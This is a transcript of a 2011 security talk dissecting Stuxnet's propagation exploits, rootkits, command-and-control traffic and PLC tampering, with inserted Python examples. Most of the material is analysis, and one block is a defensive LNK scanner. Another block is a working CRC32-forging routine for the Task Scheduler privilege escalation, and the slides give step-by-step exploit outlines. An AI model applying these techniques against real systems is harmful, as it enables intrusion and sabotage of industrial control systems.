Stuxnet dc9723
Transcript of Stuxnet dc9723
Tomer Teller , DC9723, 18/1/11
Stuxnet:How to take over a (nuclear) power plant
Who Am I ?
A Black Hat gone good (courier -> cracker)
Security Evangelist at Check Point
Specialize in network hacking & reversing
Finished all levels of Angry Birds (3 stars!)
Why are we here ?
We like Malware
Stuxnet is a Malware!
Iran is involved
Microsoft got pwn'd
Learn new techniques
See some DEMO's (hopefully)
Terminology
SCADA - stands for Supervisory Control and Data Acquisition. The term is often used interchangeably with Industrial Control Systems (ICS): computer systems that monitor and control industrial, infrastructure, or facility-based processes.
PLC - A Programmable Logic Controller (PLC) is an embedded controller that drives machinery, e.g. on factory assembly lines.
Field PG - the Siemens ruggedized portable PC used to program PLCs.
WinCC/Step7 - Siemens software installed on the Field PG: Step 7 is the IDE/compiler used to program the PLC, WinCC is the SCADA/HMI visualization software.
Threat Overview
Architecture: a single DLL with the payloads stored as resources; component based
Exploits: 4 undisclosed (zero-day) vulnerabilities!
Techniques: a "cunning" LoadLibrary() maneuver
Statistics
(chart: infection statistics, ref: Symantec dossier paper)
This is not normal…
Welcome to the Battle Field
What's going to happen?
(diagram: target environment with a water pipe, a gas pipeline and a nuclear reactor)
Mission Objectives
Introduce Threat to Target
Propagate inside the network
Infect Field PG machines
GOAL:Reprogram ICS machines
The First Infection
An insider
A contractor
A SCADA conference USB give-away
Super Sheep over the fence
Removable Drive Propagation
Okay, now what ?
LNK auto-execution (MS10-046)
Autorun.inf technique
LNK Auto-Execution (MS10-046)
Design-level flaw in how the Windows Shell parses LNK (shortcut) files.
The file format can store a link target that is a Control Panel applet (CPL) DLL.
The vulnerable code processes such links the same way it processes icons: it loads the DLL in order to render the shortcut.
Problem: the system does not check whether the DLL is in SYSTEM32 or part of a white list (registered CPLs).
The result: arbitrary DLLs can be loaded just by displaying a shortcut, e.g. when Explorer shows the folder that contains it.
LNK Binary Format
Offset  Size  Field
0x0000  4     HeaderSize (always 0x4C)
0x0004  16    LinkCLSID
0x0014  4     LinkFlags
...
0x0042  2     Reserved1
The optional structures follow the header; the LinkTargetIDList is present when the HasLinkTargetIDList flag is set in LinkFlags.

LNK Binary Format (DIY)
Control Items (the ItemID carrying the Control Panel target)
Offset  Size  Field
0x0000  2     ItemIDSize
0x0002  2     wDummy
...
0x0018  n     Path
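As an added example (not from the talk and not Stuxnet's own code), the following Python parses the header and LinkTargetIDList fields laid out above and flags a Control Panel shortcut whose item list carries a DLL/CPL path outside SYSTEM32, the condition the slide says the Shell never checked. The sample shortcut it builds is constructed here for illustration only; the `TRUSTED_PREFIXES` allow-list and the Control Panel CLSID check are heuristics of this example, not Windows' logic.

```python
import struct

# ShellLinkHeader constants from [MS-SHLLINK]. The sample inputs are built by
# build_sample_lnk() below and are constructed for this example, not real files.
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C
HAS_LINK_TARGET_ID_LIST = 0x00000001  # LinkFlags bit A
# Shell folder CLSID of the Control Panel, {21EC2020-3AEA-1069-A2DD-08002B30309D}
CONTROL_PANEL_CLSID = bytes.fromhex("2020ec21ea3a6910a2dd08002b30309d")
# Where a CPL is expected to live; anything else is treated as suspicious (heuristic of this example)
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "%systemroot%\\system32\\")


def parse_header(lnk: bytes) -> int:
    """Validate the fixed 0x4C-byte ShellLinkHeader and return LinkFlags."""
    if len(lnk) < HEADER_SIZE:
        raise ValueError("too short for a shell link")
    header_size, clsid, link_flags = struct.unpack_from("<I16sI", lnk, 0)
    if header_size != HEADER_SIZE or clsid != SHELL_LINK_CLSID:
        raise ValueError("not a shell link header")
    return link_flags


def parse_id_list(lnk: bytes, offset: int) -> list:
    """Return the ItemID payloads of the LinkTargetIDList that starts at offset."""
    (id_list_size,) = struct.unpack_from("<H", lnk, offset)
    offset += 2
    end = offset + id_list_size
    items = []
    while offset + 2 <= end:
        (item_size,) = struct.unpack_from("<H", lnk, offset)
        if item_size == 0:  # TerminalID ends the list
            break
        if item_size < 2 or offset + item_size > end:
            raise ValueError("malformed ItemID")
        items.append(lnk[offset + 2:offset + item_size])
        offset += item_size
    return items


def utf16_strings(blob: bytes, min_chars: int = 4) -> list:
    """Pull printable UTF-16LE runs out of a blob, trying both byte alignments."""
    found = []
    for start in (0, 1):
        run = []
        for i in range(start, len(blob) - 1, 2):
            ch = blob[i] | (blob[i + 1] << 8)
            if 0x20 <= ch < 0x7F:
                run.append(chr(ch))
                continue
            if len(run) >= min_chars:
                found.append("".join(run))
            run = []
        if len(run) >= min_chars:
            found.append("".join(run))
    return found


def suspicious_cpl_targets(lnk: bytes) -> list:
    """Return DLL/CPL paths a Control Panel shortcut would load from outside system32."""
    flags = parse_header(lnk)
    if not flags & HAS_LINK_TARGET_ID_LIST:
        return []
    items = parse_id_list(lnk, HEADER_SIZE)
    if not any(CONTROL_PANEL_CLSID in item for item in items):
        return []  # not a Control Panel link: out of scope for the MS10-046 pattern
    hits = []
    for item in items:
        for text in utf16_strings(item):
            low = text.lower()
            if low.endswith((".dll", ".cpl")) and not low.startswith(TRUSTED_PREFIXES):
                hits.append(text)
    return hits


def build_sample_lnk(target_path: str) -> bytes:
    """Constructed test input: a minimal Control Panel shortcut pointing at target_path."""
    header = struct.pack("<I16sI", HEADER_SIZE, SHELL_LINK_CLSID, HAS_LINK_TARGET_ID_LIST)
    header += b"\x00" * (HEADER_SIZE - len(header))
    item_payloads = [
        b"\x1f\x00" + CONTROL_PANEL_CLSID,              # folder item: Control Panel
        target_path.encode("utf-16-le") + b"\x00\x00",  # item carrying the CPL path
    ]
    id_list = b"".join(struct.pack("<H", len(p) + 2) + p for p in item_payloads)
    id_list += b"\x00\x00"  # TerminalID
    return header + struct.pack("<H", len(id_list)) + id_list


if __name__ == "__main__":
    print(suspicious_cpl_targets(build_sample_lnk("E:\\payload.dll")))
```

Run it against a directory of `.lnk` files from a removable drive and anything it returns is worth a second look; a real detector would also walk the remaining optional structures and resolve environment variables before applying the allow-list.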
Autorun.inf Technique
We all know the AutoRun.inf file & the AutoPlay dialog.
The code that parses that file is very "flexible".
How flexible? One file can be a valid EXE and a valid autorun.inf at the same time: Stuxnet appends the autorun commands to the end of its executable, and the parser skips everything it cannot interpret until it reaches the [autorun] section.
(diagram: a single file, the EXE first and the AutoRun section appended at the end)
The LoadLibrary() Technique
Whenever Stuxnet needs to load a DLL (including itself), it uses a special method to bypass anti-virus behaviour-blocking detection.
Stuxnet calls LoadLibrary() with a specially crafted file name that does not exist on disk; on its own, such a call would simply fail.
Stuxnet has hooked the file-handling routines in ntdll.dll (ZwOpenFile, ZwCreateSection, ZwMapViewOfSection, ZwQueryAttributesFile and friends) to watch for requests to load these specially crafted names.
The hooks map such a name to a different location specified by Stuxnet (a copy of the module held in memory), so the DLL is loaded without ever existing as a file on disk.
File name example: KERNEL32.DLL.ASLR.[ADDRESS]
User/Kernel Space rootkits
User space rootkit: hides files by hooking Kernel32 & NTDLL
▪ FindFirstFileW, FindNextFileW
▪ NtQueryDirectoryFile, ZwQueryDirectoryFile
Kernel space rootkit: registers a device driver (MrxNet.sys) to intercept I/O Request Packets (IRPs)
▪ Monitors directory control & query (read/write)
▪ Detects & infects removable devices
Compromised Certificates
The driver was digitally signed with a legitimate code-signing certificate that Windows trusts (first a Realtek Semiconductor certificate, later a JMicron Technology one).
Both companies seem to have offices in the Hsinchu Science and Industrial Park (Taiwan).
No Admin?! No Problem! (Vista+ Style)
Privilege escalation in Task Scheduler (MS10-092), published 20-11-2010: www.exploit-db.com/exploits/15589
The task's XML file is protected only by a CRC32 checksum.
Modify the original task to run under LocalSystem.
Fix the CRC checksum by "padding" the file until its CRC32 collides with the original's.
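As an added example, not the exploit linked on the slide and not code from the talk: given the original task XML and a modified copy, this Python computes the 4-byte suffix that makes the modified file's CRC32 collide with the original's, which is the "padding" step above done deterministically rather than by search. The two XML fragments are constructed for illustration and are not the real task file format; the block shows only the checksum side, and whether a padded file still parses as a task is a separate question the slide does not cover.

```python
import zlib

# Reflected CRC-32 table (polynomial 0xEDB88320), the same CRC that zlib.crc32 computes.
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)
# Every table entry has a distinct top byte, so a top byte identifies its entry.
TOP_BYTE_TO_INDEX = {entry >> 24: i for i, entry in enumerate(CRC_TABLE)}


def crc32(data: bytes) -> int:
    """CRC-32 as a 32-bit unsigned value."""
    return zlib.crc32(data) & 0xFFFFFFFF


def forge_crc32_suffix(data: bytes, target_crc: int) -> bytes:
    """Return 4 bytes such that crc32(data + suffix) == target_crc."""
    state = crc32(data) ^ 0xFFFFFFFF  # CRC register after consuming data
    want = target_crc ^ 0xFFFFFFFF    # register value needed at the end
    # Backward pass: after 4 more bytes the register no longer depends on `state`,
    # only on the 4 table entries used, so pick those entries from the top byte down.
    indices = [0] * 4
    cur = want
    for k in (3, 2, 1, 0):
        i = TOP_BYTE_TO_INDEX[cur >> 24]
        indices[k] = i
        cur = ((cur ^ CRC_TABLE[i]) << 8) & 0xFFFFFFFF
    # Forward pass: choose each byte so the register update uses the planned entry.
    out = bytearray()
    for i in indices:
        out.append((state ^ i) & 0xFF)
        state = (state >> 8) ^ CRC_TABLE[i]
    return bytes(out)


def retarget_task_xml(original: bytes, modified: bytes) -> bytes:
    """Pad `modified` so its CRC32 matches `original` (the slide's "padding" step)."""
    return modified + forge_crc32_suffix(modified, crc32(original))


# Constructed sample, not the real task file: the principal is switched to LocalSystem.
ORIGINAL_TASK = b"<Task><Principal><UserId>alice</UserId></Principal></Task>"
MODIFIED_TASK = b"<Task><Principal><UserId>LocalSystem</UserId></Principal></Task>"

if __name__ == "__main__":
    padded = retarget_task_xml(ORIGINAL_TASK, MODIFIED_TASK)
    print(hex(crc32(ORIGINAL_TASK)), hex(crc32(padded)), padded[-4:].hex())
```

The takeaway for defenders is the one the slide implies: a CRC is an integrity check against accidental corruption, not against an adversary, and any file whose only protection is a CRC32 can be retargeted in constant time; an HMAC or signature over the task definition is what would have stopped this.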
No Admin?! No Problem! (XP Style)
Privilege escalation in keyboard layout loading (MS10-073)
A keyboard layout file can be loaded from anywhere in the system.
Out-of-bounds index into an array of function pointers in win32k.sys:
cf12fa38 cf933423 win32k!KbdNlsFuncTypeDummy   [index 0]
cf12fa3c cf93342e win32k!KbdNlsFuncTypeNormal  [index 1]
cf12fa40 cf933474 win32k!KbdNlsFuncTypeAlt     [index 2]
cf12fa44 ff496867                              [index 3]
cf12fa48 ff466564                              [index 4]
cf12fa4c 60636261 <- user space address        [index 5]
cf12fa50 0000006e ...
1. Copy the bad code to that user-space address.
2. Change the layout so it points at index #5.
3. Load the keyboard layout.
Demo(s) Time
Autorun.inf
LNK vulnerability (MS10-046)
User space rootkit (source available)
Mission #1 Completed
Recap
Introduce Threat to Target
Propagate inside the network
Infect Field PG machines
GOAL:Reprogram ICS machines
MS08-067 – Server Service Vulnerability
SRVSVC is an RPC interface which controls shares and files.
Bind to this interface via SMB and call one of its functions, NetprPathCanonicalize(), with a malformed path string, e.g. \<name>\..\..\<rest of string>.
This results in a buffer overflow; successful exploitation leads to code execution with SYSTEM privileges.
NetprPathCanonicalize()
Each "/.." removes the preceding path component by searching backwards for '\':
\share\path1\path2/../../../../buff   -> search for '\'
\share\path1/../../../buff            -> search for '\'
\share/../../buff                     -> search for '\'
/../buff                              -> search for '\' continues past the start of the buffer
Buffer Overflow
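The walk above, as an added Python model that is neither the Windows code nor code from the talk: it applies the one rule the slide shows (each "/.." cuts back to the previous '\') and reports the point where the backward search would leave the buffer, next to a variant that rejects such paths instead of continuing. The benign path in the usage is constructed; the malicious one is the slide's own.

```python
# Simplified model of the NetprPathCanonicalize() walk from the slide. Added
# illustrative code: it models only the behaviour described (each "/.." cuts back
# to the previous '\') and marks where an unchecked backward search leaves the buffer.

SEP = "\\"


def canonicalize_trace(path: str):
    """Return (intermediate paths, overflowed) for the slide's simplified algorithm."""
    trace = [path]
    while "/.." in path:
        dots = path.index("/..")
        prev_sep = path.rfind(SEP, 0, dots)  # search backwards for '\'
        if prev_sep < 0:
            # The vulnerable code keeps scanning backwards past the start of the
            # buffer: this is the step where MS08-067 becomes memory corruption.
            return trace, True
        path = path[:prev_sep] + path[dots + 3:]
        trace.append(path)
    return trace, False


def canonicalize_safe(path: str) -> str:
    """Hardened variant: refuse any path whose '..' would climb above the root."""
    trace, overflowed = canonicalize_trace(path)
    if overflowed:
        raise ValueError("path escapes the root: %r" % path)
    return trace[-1]


if __name__ == "__main__":
    steps, overflowed = canonicalize_trace("\\share\\path1\\path2/../../../../buff")
    for step in steps:
        print(step)
    print("overflow" if overflowed else "ok")
    print(canonicalize_safe("\\share\\a\\b/../c"))  # constructed benign path
```

The trace reproduces the four lines on the slide exactly, which is the point: the bug is not in any single string operation but in the loop having no notion of where the buffer begins.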
MS10-061 – Print Spooler Vulnerability
Published in 2009 in a hacker magazine (Hakin9); patched only in September 2010.
Allows a file to be written into the %System% folder by "printing" a document to a file on a shared printer.
Stuxnet "prints" 2 files:
▪ A Managed Object Format (MOF) file, used to register a WMI event consumer
▪ The Stuxnet worm itself
Once the OS detects the MOF file in a specific directory (%SystemRoot%\system32\wbem\mof\<file>) it compiles it, and the registered event runs the dropped executable.
Network Shares Infection
Stuxnet enumerates all user accounts of the computer and the domain.
It tries all available network resources:
▪ Using the user's credentials, drops the Stuxnet executable on the remote share
▪ Schedules a network job to run it 2 minutes later: NetScheduleJobAdd()
P2P Communication Component
Stuxnet installs an RPC client/server. Compromised computers can connect to each other and ask for the latest version:
Infected machine acting as client -> Get Version (0)    -> Infected machine acting as server
Infected machine acting as client <- Send Version       <- Infected machine acting as server
Infected machine acting as client -> Request Update (4) -> Infected machine acting as server
Infected machine acting as client <- Send Update        <- Infected machine acting as server
RPC server routines:
0: Return current version
1: Inject & execute
2: Load module
3: Inject into lsass.exe
4: Send current version
5: Create process
6: Read file
ref: Symantec dossier paper
Command & Control Component
Stuxnet communicates back using an HTTP C&C backdoor and encrypted data.
Infected machine -> GET www.msn.com              (connectivity check)
Infected machine <- 200 OK
Infected machine -> GET index.php?data=[encrypted] -> Command and Control server
Infected machine <- Command X
Infected machine <- Command Y
ref: Symantec dossier paper
Mission #2 Completed
(diagram: the infected machine pings the C&C server, which answers that it is alive)
Recap
Introduce Threat to Target
Propagate inside the network
Infect Field PG machines
GOAL:Reprogram ICS machines
PLC RootKit
On the Field PG, Stuxnet looks for:
▪ A specific version of STEP7/WinCC
▪ A specific network card
▪ A specific PLC model & version connected
Stuxnet replaces the DLL on the Field PG that is in charge of communicating with the PLC (s7otbxdx.dll), keeping the original under a new name so the replacement can forward calls to it.
After the replacement Stuxnet is able to:
▪ Monitor PLC commands being written to and read from the PLC
▪ Infect a PLC by inserting bad commands
▪ Mask the fact that the PLC is infected
Infected PLC Example (READ/WRITE)
(diagram) Read path: Step7/WinCC -> Read() -> new DLL -> Read() -> original DLL -> PLC. The PLC returns the original data; the new DLL hands modified data back to Step7/WinCC.
(diagram) Write path: Step7/WinCC -> Write(data) -> new DLL -> Write(modified data) -> original DLL -> PLC.
(diagram) The Field PG writes the value 5; the new DLL forwards 500 to the PLC. On read-back the PLC reports 500, and the new DLL shows 5 to the operator, who sees nothing wrong.
Recap
Introduce Threat to Target
Propagate inside the network
Infect Field PG machines
GOAL:Reprogram ICS machines
Mission Accomplished
Who's Behind It ?
Some say Israel:
▪ b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb
▪ myrtus -> myrtle -> Hadassah -> Queen Esther
▪ My-RTUs -> Remote Terminal Unit -> control SCADA systems
▪ 0x19790509 (a registry marker value Stuxnet uses to avoid re-infecting a machine): May 09, 1979, the date of the Iranian execution of Habib Elghanian, a prominent Jewish businessman in Iran
Some say Germany
Some say USA
Questions ?
kthxbye
Tomer Teller